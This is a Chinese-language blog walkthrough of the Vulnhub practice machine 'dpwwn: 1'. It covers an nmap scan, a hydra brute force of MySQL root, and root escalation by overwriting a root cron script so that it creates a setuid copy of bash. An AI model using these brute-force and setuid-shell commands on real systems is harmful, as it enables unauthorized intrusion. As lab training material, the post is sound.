首页 > 其他分享 >Vulnhub: dpwwn: 1靶机

Vulnhub: dpwwn: 1靶机

时间:2023-05-31 23:11:55浏览次数:33  
标签:home 192.168 dpwwn Vulnhub mysql mistic 靶机 root bash

kali:192.168.111.111

靶机:192.168.111.131

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.131

image

爆破出mysql的root用户为空密码

hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.111.131 -s 3306 mysql -t 64

image

在mysql数据库中发现mistic用户的密码

image

提权

计划任务会定时以root身份执行/home/mistic/logrot.sh

cat /etc/crontab

image

修改/home/mistic/logrot.sh内容提升为root

echo 'cp /bin/bash /tmp/bash;chmod 4777 /tmp/bash' > /home/mistic/logrot.sh
/tmp/bash -p

image

image

flag

image

标签:home,192.168,dpwwn,Vulnhub,mysql,mistic,靶机,root,bash
From: https://www.cnblogs.com/ctostm/p/17447615.html

相关文章

  • VulnHub-Gemini Inc: 1
    靶机地址:https://www.vulnhub.com/entry/gemini-inc-1,227/目标:Identifyanyvulnerabilitiespossiblewiththegoalofcompletesystemcompromisewithrootprivilege.Todemonstratethelevelofaccessobtained,pleaseprovidethecontentofflag.txtlocatedint......
  • VulnHub_DC-3渗透流程
    VulnHub_DC-3DC-3是另一个特意建造的易受攻击的实验室,旨在获得渗透测试领域的经验。与之前的DC版本一样,这个版本是为初学者设计的,尽管这一次只有一个flag、一个入口点并且根本没有任何线索。必须具备Linux技能和熟悉Linux命令行,以及一些使用基本渗透测试工具的经验。......
  • VulnHub_DC-2渗透流程
    VulnHub_DC-2信息收集探测目标主机IP地址arp-scan-lnmap-sV-A-p-192.168.157.143得知开启80端口的http服务与7744端口开启的ssh访问网站拿flag1访问发现有域名但看不到ip,原因是DNS未转换在windows中DNS的域名文件在C:\windows\system32\drivers\etc\hosts修改......
  • Vulnhub之Decoy靶机-详细提权过程补充
    VulnhubDecoy提权补充在拿到用户296640a3b825115a47b68fc44501c828的密码server后,为了方便观察现象,同时开启两个shell,并且需要指定-t"bash--noprofile"以逃避受限shell,登录成功后,要修改PATH环境变量,使其包含正常的环境变量:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:......
  • VulnHub_DC-1渗透流程
    DC-1DC-1是一个专门建造的易受攻击的实验室,目的是在渗透测试领域获得经验。它旨在为初学者提供挑战,但它的难易程度取决于您的技能和知识,以及您的学习能力。要成功完成此挑战,您将需要Linux技能、熟悉Linux命令行以及使用基本渗透测试工具的经验,例如可以在KaliLinux或P......
  • Basic_pentesting_1靶机渗透流程
    Basic_pentesting_1DescriptionThisisasmallboot2rootVMIcreatedformyuniversity’scybersecuritygroup.Itcontainsmultipleremotevulnerabilitiesandmultipleprivilegeescalationvectors.IdidallofmytestingforthisVMonVirtualBox,sot......
  • VulnHub-Narak靶机渗透流程
    VulnHub-NarakDescriptionNarakistheHinduequivalentofHell.YouareinthepitwiththeLordofHellhimself.CanyouuseyourhackingskillstogetoutoftheNarak?Burningwallsanddemonsarearoundeverycornerevenyourtrustytoolswillbetra......
  • Vulnhub: AI-WEB-1.0靶机
    kali:192.168.111.111靶机:192.168.111.132信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.132robosts.txt提示两个目录m3diNf0目录下存在info.php漏洞利用se3reTdir777目录下的输入框存在sql注入从phpinfo页面中得知网站根路径利用s......
  • Me-and-My-Girlfriend-1靶机渗透流程
    Me-and-My-Girlfriend-1靶机下载Description:ThisVMtellsusthatthereareacoupleofloversnamelyAliceandBob,wherethecouplewasoriginallyveryromantic,butsinceAliceworkedataprivatecompany,"CebanCorp",somethinghaschangedfr......
  • Vulnhub靶机DevRandom CTF1.1详细测试过程
    DevRandomCTF:1.1靶机信息名称:DevRandomCTF:1.1地址:https://www.vulnhub.com/entry/devrandom-ctf-11,450/识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/DevRandom]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24|S......